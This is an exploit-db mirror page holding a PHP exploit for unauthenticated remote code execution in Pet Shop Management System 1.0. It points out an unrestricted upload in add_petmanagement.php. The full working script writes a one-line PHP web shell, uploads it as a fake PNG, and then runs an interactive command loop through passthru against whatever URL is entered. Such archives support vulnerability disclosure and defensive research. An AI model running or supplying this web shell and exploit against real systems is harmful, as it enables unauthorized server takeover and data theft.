bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50353.php
Offensive Security 68d01808ce DB: 2021-09-30 
6 changes to exploits/shellcodes

Mitrastar GPT-2541GNAC-N1 - Privilege escalation
Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
2021-09-30 05:02:08 +00:00

93 lines
No EOL
2.3 KiB
PHP
Raw Blame History

# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Author: Mr.Gedik
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
# Version: 1.0
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB
Vulnerable code controllers/add_petmanagement.php
Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],
$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .
addslashes($_FILES["images"]["name"]));
Exploit
#############
<?php
/*
@author:mrgedik
*/
function anim($msg, $time)
{
$msg = str_split($msg);
foreach ($msg as $ms) {
echo $ms;
usleep($time);
}
}
anim("__ __ _____ _ _ _
| \/ | / ____| | (_) |
| \ / |_ __| | __ ___ __| |_| | __
| |\/| | '__| | |_ |/ _ \/ _` | | |/ /
| | | | |_ | |__| | __/ (_| | | <
|_| |_|_(_) \_____|\___|\__,_|_|_|\_\
", 900);
echo PHP_EOL;
while(1)
{
echo anim("Target (http://example.com/path/): ", 800);
$target = trim(fgets(STDIN));
echo PHP_EOL;
if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
echo "Not a valid URL".PHP_EOL;
}else {
break;
}
}
@unlink("exp.php");
$fw = fopen("exp.php","a+");
fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
fclose($fw);
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
$fields = [
'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
];
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
$response = curl_exec($ch);
@unlink("exp.php");
if(strstr($response,"success"))
{
while(1)
{
echo anim("root@pwn: ", 800);
$command = trim(fgets(STDIN));
if($command == trim("exit"))
{
exit;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
echo curl_exec($ch);
curl_close ($ch);
}
}else
{
echo anim("Fail", 800);
}
?>
Reference in a new issue View git blame Copy permalink